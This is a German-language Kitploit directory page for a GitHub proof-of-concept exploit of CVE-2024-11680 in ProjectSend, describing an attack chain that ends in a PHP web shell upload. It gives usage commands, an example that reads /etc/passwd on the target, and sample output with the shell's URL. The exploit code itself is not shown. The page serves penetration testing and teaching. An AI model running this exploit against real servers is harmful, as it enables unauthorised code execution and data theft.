Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-11680 — Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2024-11680, eine kritische Schwachstelle in ProjectSend r1605 und früheren Versionen. Der Exploit zielt auf eine fehlerhafte Authentifizierung ab, die durch Probleme mit falschen Berechtigungseinstellungen und Befehlsinjektion verursacht wird. | Kitploit
Tools/GitHubGitHub/qucklecrabik/cve-2024-11680
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
vor 5 MonatenNoch nicht geprüft

Über

Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2024-11680, eine kritische Schwachstelle in ProjectSend r1605 und früheren Versionen. Der Exploit zielt auf eine fehlerhafte Authentifizierung ab, die durch Probleme mit falschen Berechtigungseinstellungen und Befehlsinjektion verursacht wird.

Teilen

ProjectSend CVE-2024-11680 Exploit

Dies ist ein Proof-of-Concept-Exploit für CVE-2024-11680, eine nicht authentifizierte Konfigurationsänderungs- und Web-Shell-Upload-Schwachstelle in ProjectSend.

Beschreibung

Der Exploit nutzt mehrere Schwachstellen in ProjectSend aus:

  • CSRF-Token-Umgehung, die Konfigurationsänderungen ermöglicht
  • Unsicherere Client-Registrierungseinstellungen
  • Uneingeschränkter Dateiupload, der zur Remote-Code-Ausführung führt

Voraussetzungen

  • Python 3.x
  • Erforderliche Python-Pakete:
    root@kitploit:~
    pip install requests colorama
    

Verwendung

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Argumente

  • -u, --url: Ziel-URL (z.B. )
http://target.com/projectsend
  • -c, --command: Befehl, der auf dem Ziel ausgeführt werden soll (Standard: id)
  • Beispiele

    root@kitploit:~
    # Python-Version abrufen
    python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
    
    # Verzeichnisinhalt auflisten
    python3 exploit.py -u http://target.com/projectsend -c "ls -la"
    
    # Systeminformationen abrufen
    python3 exploit.py -u http://target.com/projectsend -c "uname -a"
    
    # Passwd-Datei lesen
    python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
    

    Funktionsweise

    1. Aufklärung: Ruft CSRF-Token ab und überprüft die Zielverwundbarkeit
    2. Konfigurationsmanipulation: Aktiviert unsichere Client-Registrierungsoptionen
    3. Benutzerregistrierung: Erstellt ein neues Client-Konto mit automatischer Genehmigung
    4. Dateiupload: Lädt eine PHP-Web-Shell mit der Erweiterung .phtml hoch
    5. Befehlsausführung: Führt angegebene Befehle über die hochgeladene Shell aus

    Funktionen

    • Automatische CSRF-Token-Extraktion
    • Zufällige Generierung von Benutzeranmeldeinformationen
    • Intelligente Dateibenennung und Zeitstempelerkennung
    • Farbige Ausgabe für bessere Sichtbarkeit
    • Eingebaute Befehlsausführungsfähigkeit

    Rechtlicher Hinweis

    Dieses Tool dient nur zu Bildungszwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, für die Sie ausdrückliche Erlaubnis zum Testen haben.

    Referenzen

    • CVE-2024-11680

    Beispielausgabe

    root@kitploit:~
    [+] Target is vulnerable
    [+] Insecure options enabled
    [+] User registered successfully.
    [+] New username: NoDLQWYF
    [+] New password: X02A3g9LuN4S
    [+] File uploaded: kLoISqdA.phtml
    [+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
    [+] Command Output:
    Python 3.9.2
    
    Tool herunterladen